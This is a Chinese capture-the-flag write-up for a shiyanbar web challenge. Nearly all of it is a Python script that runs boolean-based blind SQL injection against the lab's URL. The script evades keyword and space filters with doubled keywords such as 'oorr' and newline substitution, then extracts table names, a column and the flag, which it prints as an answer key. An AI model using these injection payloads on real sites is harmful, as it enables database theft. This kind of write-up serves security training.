[CTF]认真一点！

类型：web
网址：http://www.shiyanbar.com/ctf/2009
攻击：sql注入
一句话总结：or 空格等特殊字符被过滤，使用oorr，()等代替

writeup

import requests

# 暴力猜解当前数据库的长度
# str1 = 'You are in'
# url = 'http://ctf5.shiyanbar.com/web/earnest/index.php'
# for i in range(1,30):
    # key = {'id':"0'oorr(length(database())=%s)oorr'0"%i}
    # r = requests.post(url, data=key).text
    # print(i)
    # if str1 in r:
        # print("the lenghth of database is %s"%i)
        # break
        
# 暴力猜解当前数据库的名称 ctf_sql_bool_blind
# guess = '~abcdefghijklmnopqrstuvwxyz_0123456789=+-*/{\}?!:@#$%&()[],.'
# str1 = 'You are in'
# url = 'http://ctf5.shiyanbar.com/web/earnest/index.php'
# database = ''
# for i in range(1,19):
    # for j in guess:
        # key = {'id':"0'oorr((mid((database())from(%s)foorr(1)))='%s')oorr'0"%(i,j)}
        # r = requests.post(url, data=key).text
        # print(key)
        # if str1 in r:
            # database += j
            # print(j)
            # break
# print(database)

# 暴力猜解数据表的长度 11
# guess = '~abcdefghijklmnopqrstuvwxyz_0123456789=+-*/{\}?!:@#$%&()[],.'
# str1 = 'You are in'
# url = 'http://ctf5.shiyanbar.com/web/earnest/index.php'
# i = 1
# while True:
    # flag = "0'oorr((select(mid(group_concat(table_name separatoorr '@')from(%s)foorr(1)))from(infoorrmation_schema.tables)where(table_schema)=database())='')oorr'0"%i
    # flag = flag.replace(' ', chr(0x0a))
    # key = {'id':flag}
    # r = requests.post(url, data=key).text
    # print(key)
    # if str1 in r:
        # print('the lenght of tables is %s'%i)
        # break
    # i += 1
    
# 暴力破解数据表名称 fiag@users-
# guess = '~abcdefghijklmnopqrstuvwxyz_0123456789=+-*/{\}?!:@#$%&()[],.'
# str1 = 'You are in'
# url = 'http://ctf5.shiyanbar.com/web/earnest/index.php'
# tables = ''
# for i in range(1,12):
    # for j in guess:
        # flag = "0'oorr((select(mid(group_concat(table_name separatoorr '@')from(%s)foorr(1)))from(infoorrmation_schema.tables)where(table_schema)=database())='%s')oorr'0"%(i,j)
        # flag = flag.replace(' ', chr(0x0a))
        # key = {'id':flag}
        # r = requests.post(url, data=key).text
        # print(key)
        # if str1 in r:
            # tables += j
            # print(j)
            # break
# print(tables)

# 暴力破解数据表的列名 fl$4g
# guess = '~abcdefghijklmnopqrstuvwxyz_0123456789=+-*/{\}?!:@#$%&()[],.'
# str1 = 'You are in'
# url = 'http://ctf5.shiyanbar.com/web/earnest/index.php'
# columns = ''
# for i in range(1,6):
    # for j in guess:        
        # flag = "0'oorr((select(mid(group_concat(column_name separatoorr '@')from(%s)foorr(1)))from(infoorrmation_schema.columns)where(table_name)='fiag')='%s')oorr'0"%(i, j)    
        # flag = flag.replace(' ', chr(0x0a))
        # key = {'id':flag}       
        # r = requests.post(url, data=key).text
        # print(key)
        # if str1 in r:
            # columns += j
            # print(j)
            # break
            
# print(columns)

# 暴力猜解数据表字段长度 14
# guess = '~abcdefghijklmnopqrstuvwxyz_0123456789=+-*/{\}?!:@#$%&()[],.'
# str1 = 'You are in'
# url = 'http://ctf5.shiyanbar.com/web/earnest/index.php'
# i = 1
# while True:
    # flag = "0'oorr((select(mid((fl$4g)from(%s)foorr(1)))from(fiag))='')oorr'0"%i
    # flag = flag.replace(' ', chr(0x0a))
    # key = {'id':flag}       
    # r = requests.post(url, data=key).text
    # print(key)
    # if str1 in r:
        # print('the length of data is %s'%i)
        # break
    # i += 1

# 暴力猜解flag   flag{haha~you-win!}
guess = '~abcdefghijklmnopqrstuvwxyz_0123456789=+-*/{\}?!:@#$%&()[],.'
str1 = 'You are in'
url = 'http://ctf5.shiyanbar.com/web/earnest/index.php'
data = ''
for i in range(1,20):
    for j in guess:        
        flag = "0'oorr((select(mid((fl$4g)from(%s)foorr(1)))from(fiag))='%s')oorr'0"%(i, j)    
        flag = flag.replace(' ', chr(0x0a))
        key = {'id':flag}       
        r = requests.post(url, data=key).text
        print(key)
        if str1 in r:
            data += j
            print(j)
            break
            
print(data)

FLAG

flag{haha~you win!}